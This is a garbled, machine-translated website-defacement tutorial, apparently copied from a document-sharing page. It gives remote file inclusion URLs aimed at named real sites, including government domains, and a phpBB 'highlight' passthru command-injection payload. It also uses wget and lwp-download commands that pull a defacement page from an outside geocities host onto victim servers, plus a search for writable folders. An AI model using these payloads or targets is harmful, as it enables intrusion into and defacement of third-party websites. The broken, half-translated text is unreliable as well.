http://www.sports-media.org/adspro/jh.html http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm <
http://www.giphted.com/index.php?siteName=pics 2Fom% 2Findex.php% izvorna datoteka http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/scr ipt/arai2.jpg? dikotak idi: pwd tako pics 2Fom% 2Findex.php% uklonjen kako ubrizgati svojim http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/scr ipt/arai2.jpg? dikotak idi: http://www.geocities.com/nusantarajaya_2004/arai.html wget-O / izvoz / home / beangyy / www / arai.html kako tvrd to http://www.giphted.com/arai.html ========================================= zamrljati phpBB / forum http://www.bpmpt.go.id/forum/index.php izvorna datoteka uključuje / db.php? phpbb_root_path = to je bug pa uklonjena index.php http://www.bpmpt.go.id/forum/includes/db.php?phpbb_root_path=http://www.geocities.c om/sandal_karet/script/ara2.jpg? dikotak idi: pwd Što izlaz "hackiranje" znači dipath Ali sam bio uspješan, to je kao u Lu ... ... apain ========================================== zamrljati phpBB / forum II http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12 izvorna datoteka & =% Istaknuti 2527.passthru ($ HTTP_GET_VARS [a]).% 2527 & a = id; pwd to je bug kako ubrizgati svojim http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12&highlight =% 2527.passthru ($ HTTP_GET_VARS [a]).% 2527 & a = id; pwd Imam ga wget 3 načina: 1.http: / / singapore.bluejackings.net / viewtopic.php? T = 51 & istaknuti =% 2527.passthru ($ HTTP_GET_VARS [a]).% 2527 & a = wget% 20http: / / geocities.com/nusantarajaya_2004/arai.html ; izg 2.http: / / singapore.bluejackings.net / viewtopic.php? T = 51 & istaknuti =%
2527.passthru ($ HTTP_GET_VARS [a]).% 2527 & a = wget% 20http: / / geocities.com/nusantarajaya_2004/arai.html -O / var/www/singapore/jh2.htm 3.http: / / singapore.bluejackings.net / viewtopic.php? T = 51 & istaknuti =% 2527.passthru ($ HTTP_GET_VARS [a]).% 2527 & a = lwp-download% 20http: / / geocities.com/nusantarajaya_2004/arai . html; izg uobičajeni način na njenu uspješnu 3. kako tvrd to http://singapore.bluejackings.net/arai.html ========================================= Ja liat FS bez prijave http://www.friendster.com/useropen.php?uid = <<<<<< Idi svojim id broj =========================================== zbrisati s php injekcije III direktno u strijeljajte aja BOS biar ga lama2 www.target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=h ttp://www.geocities.com/ank_newz/sql.htm? Kolo uspješna kao i obično cmd php sql injekciju Što pristup mapi cmd => nađi / trajna-777-D Što mapu permision zanijeka ga znači da može biti u toj mapi apa2 pronaći mapu imate bilo posts trajna ga uzeti primjer http://www.haddenhamonline.co.uk/modules/PNphpBB2/includes/functions_admin.php? phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm? traži pristup mapi [commndnya iznad] cmd => nađi / trajna-777-D će jesti B / W sabar aja JD === Primjer-trajna == zanijeka naći: / + mnt/drive2/lost naći: Dozvola odbijena pronaći: / proc / TTY / driver: Dozvola odbijena naći: / proc/1/task/1/fd: Dozvola odbijena to znači da nema pristup nađemo druge JA probati TP folder / var / www / Također sam ga GPP imati drugo / Home / httpd / vhosts / hdca.org / httpdocs / downloads => primjer mape možete
cd / home / httpd / vhosts / hdca.org / httpdocs / downloads; [bazu komandom OSnya] [bazu komandom OSnya] => wget, dir, mačka, rm, RV-RF itd skarang smo wget cd / home / httpd / vhosts / hdca.org / httpdocs / downloads; wget http://www.geocities.com/nusantarajaya_2004/arai.html evo idu probati do cmdnya -------------------10:35:01 - Http: / / www.geocities.com/nusantarajaya_2004/arai.html => `Arai.html ' Rješavanje www.geocities.com 66.218.77.68 ... Spajanje na www.geocities.com [66.218.77.68]: 80 ... spojeni. HTTP zahtjev poslan, Čekanje odgovora ... 200 OK Dužina: 6,021 [text / html] 0k ... .. 100% 98,21 kB / s 10:35:02 (98,21 kB / s) - `arai.html 'spremljene [6,021 / 6,021] ------------------to znači da je uspjeh za spremanje jer httpdocs jednostavan način liatnya / Home / httpd / vhosts / hdca.org / httpdocs / downloads => www.hdca.org/downloads/ [datoteku zamrljati lo] Primjerice www.hdca.org / Preuzimanja / arai.html selsai DEH se lako http://www.zone-h.org/defaced/2005/08/06/www.estudioadobbato.com.ar/ http://www.blogbugs.com/index.php?mod=articledetail&&aid=Nzk = http://www.tyg2004.de/index.php?page=http://www.geocities.com/jambihackerlinkcrew/ sql.htm?&cmd=id; pwd http://img143.imageshack.us/img143/6782/hacked8lc.jpg http://www.sobatpadi.net/download/ http://www.sinjai.go.id/profil.php?kat=kelautan_perikanan&dir=http://www.geocities.co m/dian_maulani2005/inject.htm?&cmd=id; pwd;% 20 ks-la http://www.infokomputer.com/aktual/aktua
Related Documents
Kako To Hack Web Stranice
May 2020 3
Danh Ba Hack Web
November 2019 3
Hack
October 2019 30
Hack
November 2019 40
Hack
May 2020 17
Hack
November 2019 33More Documents from ""
Kasaysayan At Hacker Kraker
May 2020 3
Kako To Hack Web Stranice
May 2020 3
